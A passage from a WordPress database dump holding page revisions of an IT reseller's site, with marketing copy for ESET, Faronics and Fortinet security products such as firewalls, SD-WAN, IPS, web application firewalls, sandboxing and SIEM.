<li>Manual Malware Analysis</li>\r\n 	<li>Forensic Analysis &amp; Consulting</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li>\r\n<h4><strong>ESET Targeted Attack Protection</strong></h4>\r\n</li>\r\n</ol>\r\nComplete, seamless prevention, detection and response solution, incorporating total visibility, for remediation of any security issue in the network. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Endpoint Detection &amp; Response</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li>\r\n<h4><strong>ESET Dynamic Endpoint Protection</strong></h4>\r\n</li>\r\n</ol>\r\nComprehensive, easily managed protection, incorporating off-premise cloud sandboxing leveraging machine learning and behavior-based detection. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n</ul>\r\n<ol start=\"4\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered protection utilizing multiple technologies and incorporating visibility management and reporting across all operating systems. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Endpoint Protection Platform</li>\r\n</ul>\r\n<ol start=\"5\">\r\n 	<li>\r\n<h4><strong>ESET Dynamic Mail Protection</strong></h4>\r\n</li>\r\n</ol>\r\nBusiness solution incorporating antispam, anti-phishing and Cloud Sandbox Analysis for the complete protection of mailboxes and mail servers. Includes:\r\n<ul>\r\n 	<li>Security Management Center</li>\r\n 	<li>Cloud Sandbox Analysis</li>\r\n 	<li>Mail Security</li>\r\n</ul>\r\n<ol start=\"6\">\r\n 	<li>\r\n<h4><strong>ESET Identity &amp; Data Protection</strong></h4>\r\n</li>\r\n</ol>\r\nBusiness solution for superior and enhanced protection of an organizationâ€™s data and intellectual property. Includes:\r\n<ul>\r\n 	<li>Two-factor Authentication</li>\r\n 	<li>Endpoint Encryption</li>\r\n</ul>\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n&nbsp;','ESET','','inherit','closed','closed','','1477-revision-v1','','','2019-09-30 11:15:37','2019-09-30 03:15:37','',1477,'https://bintara.com.my/blog/2019/09/30/1477-revision-v1/',0,'revision','',0),(3548,1,'2019-09-30 11:22:53','2019-09-30 03:22:53','<div>\r\n<h2><strong>Faronics Product Solutions</strong></h2>\r\n\r\n&nbsp;\r\n<h3><strong>Deep Freeze</strong></h3>\r\nDeep Freeze makes workstation configurations indestructible. Guarantees 100% workstation recovery upon every restart.\r\n<h3><strong>Endpoint Management</strong></h3>\r\nComprehensive set of tools for deployment, management and monitoring usage of IT assets in your environment.\r\n<h3><strong>Security</strong></h3>\r\nSecurity solutions to enable your business to innovate, improve defences and reduce risk from toughest security threats.\r\n<h3><strong>Mobile</strong></h3>\r\nDetermine how mobile IT should be integrated with work processes and objectives in an enterprise environment.\r\n<h3><strong>Classroom Management</strong></h3>\r\nEffective classroom management tool that helps teachers create a better learning experience, while helping IT professionals manage multiple labs.\r\n\r\n&nbsp;\r\n<h2><strong>See what you can do with DF Cloud</strong></h2>\r\nItâ€™s the most complete set of enterprise solutions to protect, manage and optimize your IT assets, offered as a cloud suite.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<div><iframe src=\"https://www.youtube.com/embed/UNGDSKuDWew\" width=\"817\" height=\"354\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>','Faronics','','inherit','closed','closed','','1484-revision-v1','','','2019-09-30 11:22:53','2019-09-30 03:22:53','',1484,'https://bintara.com.my/blog/2019/09/30/1484-revision-v1/',0,'revision','',0),(3549,1,'2019-09-30 11:29:17','2019-09-30 03:29:17','<strong>Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n<h3>NETWORK SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Next Generation Firewall (NGFW)</strong></li>\r\n</ol>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>High-performance threat protection</strong></li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li><strong>Validated security effectiveness</strong></li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li><strong>Protect mission critical applications</strong></li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li><strong>Continuous risk assessment via automation</strong></li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li><strong>Enterprise class security management</strong></li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n2.Â <strong>Secure SD-WAN</strong>\r\n\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n3.Â <strong>IPS</strong>\r\n\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>World-class Protection</strong></li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li><strong>High performance</strong></li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li><strong>Advanced threat protection</strong></li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li><strong>Data leak protection</strong></li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n4.Â <strong>Crypto VPNs</strong>\r\n\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Hardware assisted encryption</strong></li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li><strong>Scalable Security</strong></li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li><strong>Comprehensive data communications security</strong></li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li><strong>Diverse VPNs</strong></li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li><strong>Unified Management</strong></li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n5.Â <strong>Secure Web Gateway (SWG)</strong>\r\n\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n6.Â <strong>Management &amp; Reporting</strong>\r\n\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Operationalized Visibility</strong></li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li><strong>Cross Silo Automation</strong></li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li><strong>Simplified Management</strong></li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li><strong>Rapid Detection</strong></li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li><strong>Fortinet Fabric</strong></li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n<h3>INFRASTRUCTURE PROTECTION</h3>\r\n<ol>\r\n 	<li><strong>Endpoint Protection</strong></li>\r\n</ol>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad endpoint visibility</strong></li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li><strong>Proactive endpoint defense</strong></li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li><strong>Automated threat containment</strong></li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li><strong>Secure remote access</strong></li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li><strong>Easy to deploy and manage</strong></li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n2.Â <strong>Wireless</strong>\r\n\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li><strong>Superior density, scalability and mobilit</strong><strong>y</strong></li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li><strong>Zero-touch deployment</strong></li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li><strong>Simplified deployment and capacity expansion</strong></li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li><strong>Free location and analytics</strong></li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li><strong>Scalability from 1 to 10,000 APs</strong></li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n3.Â <strong>Switching</strong>\r\n\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Security Fabric Integration with FortiLink</strong></li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li><strong>No Touch Provisioning and Management with FortiLink</strong></li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li><strong>Highly Scalable</strong></li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li><strong>Unparalleled Visibility</strong></li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li><strong>Enable voice, data, and wireless traffic across a single network</strong></li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li><strong>Virtual Stacking</strong></li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n4.Â <strong>Email Security</strong>\r\n\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Top-rated Antispam and Antiphishing</strong></li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li><strong>Independently certified advanced threat defense</strong></li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li><strong>Integrated data protection</strong></li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li><strong>High-performance mail handling</strong></li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li><strong>Enterprise-class management</strong></li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n<h3>APPLICATION SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Web Application Firewall (WAF)</strong></li>\r\n</ol>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Proven Web Application Protection</strong></li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li><strong>AI-based Threat Detection</strong></li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li><strong>Hardware-based Acceleration</strong></li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li><strong>False Positive Mitigation Tools</strong></li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li><strong>Advanced Visual Analytics</strong></li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n2.Â <strong>Application Delivery Controller</strong>\r\n\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Secure Traffic Management</strong></li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li><strong>Application Optimization</strong></li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li><strong>Security Fabric Integration</strong></li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li><strong>Global Server Load Balancing</strong></li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li><strong>Security Features</strong></li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n3.Â <strong>DDoS</strong>\r\n\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n<h3>THREAT DETECTION &amp; PREVENTION</h3>\r\n<ol>\r\n 	<li><strong>Sandbox</strong></li>\r\n</ol>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n2.Â <strong>FortiSIEM</strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Asset Self-Discovery</strong></li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li><strong>Rapid Integrations and Scalability</strong></li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li><strong>Automated Workflow</strong></li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li><strong>Unified Platform</strong></li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong>\r\n\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Augmented Intelligence (AI)</strong></li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li><strong>Rapid Threat Detection</strong></li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li><strong>Regulatory Compliance Support</strong></li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li><strong>Data Security</strong></li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li><strong>Forensic-level Reporting</strong></li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li><strong>Valuable Insights</strong></li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n[maxbutton id=\"1\" ]','Fortinet','','inherit','closed','closed','','1474-revision-v1','','','2019-09-30 11:29:17','2019-09-30 03:29:17','',1474,'https://bintara.com.my/blog/2019/09/30/1474-revision-v1/',0,'revision','',0),(3550,1,'2019-09-30 11:30:26','2019-09-30 03:30:26','<strong style=\"font-size: 10em;\">Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n<h3>NETWORK SECURITY</h3>\r\n<ol>\r\n 	<li><strong>Next Generation Firewall (NGFW)</strong></li>\r\n</ol>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>High-performance threat protection</strong></li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li><strong>Validated security effectiveness</strong></li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li><strong>Protect mission critical applications</strong></li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li><strong>Continuous risk assessment via automation</strong></li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li><strong>Security Fabric integration</strong></li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li><strong>Enterprise class security management</strong></li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n2.Â <strong>Secure SD-WAN</strong>\r\n\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n3.Â <strong>IPS</strong>\r\n\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>World-class Protection</strong></li>\r\n</ul>\r\nDeep inspection for advanced threats, 